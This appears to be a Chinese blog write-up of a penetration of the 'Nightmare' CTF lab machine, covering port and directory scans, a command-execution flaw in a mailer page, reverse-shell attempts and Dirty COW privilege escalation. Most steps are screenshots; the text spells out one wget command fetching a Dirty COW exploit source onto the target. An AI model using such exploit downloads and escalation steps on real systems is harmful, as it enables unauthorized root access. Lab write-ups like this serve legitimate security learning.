天天看點

Nightmare靶場滲透記錄

Nightmare靶場滲透記錄

一、線索資料

Nightmare靶場滲透記錄

靶機ip:192.168.56.168

kali:192.168.56.128

二、日常掃端口

Nightmare靶場滲透記錄

80端口/22端口

先檢視一波80

Nightmare靶場滲透記錄

首頁讓輸入一個名字來開始CTF

Nightmare靶場滲透記錄
Nightmare靶場滲透記錄

似乎一切正常,點選start後,出現頁面(吓一跳~)

上面提示:

這到底是什麼?有個叫PuPPET的家夥想滲透我的伺服器?失敗者一定不知道我是偉大的瓦拉布!

讓我們暫時觀察一下他,也許我可以從他的行為中了解他。

發現我的滲透了?!

這個頁面沒什麼資訊可以收集了~

三、日常掃目錄

Nightmare靶場滲透記錄

目錄中除了js,jquey沒什麼,但是url 可以發現page參數,嘗試page參數再掃一波

Nightmare靶場滲透記錄

果然有結果,發現很多,除了home,再看一下index和mailer

Nightmare靶場滲透記錄

不管輸入什麼都是連接配接失敗…我靠~~~最後發現首頁都進不去了,nmap再掃一下

Nightmare靶場滲透記錄

我靠這個老六把端口改了60080,怪不得一直進不去,重新通路一下

Nightmare靶場滲透記錄

翻譯:

親愛的莫莉,這家夥PuPPET想要我…很高興我搬到了另一個港口,這樣我可以更安全地工作!!!

我們都知道,默默無聞的安全是我們的出路。。。

通路index:

Nightmare靶場滲透記錄

是之前那個頁面

通路mailer:

Nightmare靶場滲透記錄

又是一句話~ =。=|||

但是源代碼中發現了線索:

Nightmare靶場滲透記錄

提示message goes here ,嘗試了半天,發現shell指令可以在這裡執行

Nightmare靶場滲透記錄

本地包含漏洞啊~LFI

四、反彈shell

瑞士軍刀出場

Nightmare靶場滲透記錄
Nightmare靶場滲透記錄

翻譯:

你怎麼會這麼明顯地使用netcat。指揮官,這都在日志裡。

反彈不回來,這貨還來一句嘲諷…

msf嘗試

(想說,今天的msf logo 真好看)

Nightmare靶場滲透記錄

搜尋反彈shell

Nightmare靶場滲透記錄

(淦!當機了!)

[外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-HUHyvx9a-1673448372239)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230111014000527.png)]

msf擷取shell後,回車程式設計^M ,一直無法執行指令。搞了半天,一直當機。。。

攻略了下,換了種大佬的反彈shell的方式。用nc嘗試連接配接

Nightmare靶場滲透記錄
五、提權
Nightmare靶場滲透記錄

檢視sudo -l 越權指令,沒有可用

攻略後,需要再次使用髒牛提權,上次剛用過,直接下載下傳到靶機

Nightmare靶場滲透記錄
Nightmare靶場滲透記錄

發現執行完髒牛後,卡在那裡不動了,退出後靶機直接奔潰… 醉了真是

此處沒有拿到root權限,暫沒有想到辦法…

攻略後,重新找了個髒牛提權檔案

wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
           

wget下載下傳

Nightmare靶場滲透記錄

編譯:

Nightmare靶場滲透記錄
Nightmare靶場滲透記錄

提權成功,可以在root目錄下看到flag,但是卻cat不出~~~~

繼續閱讀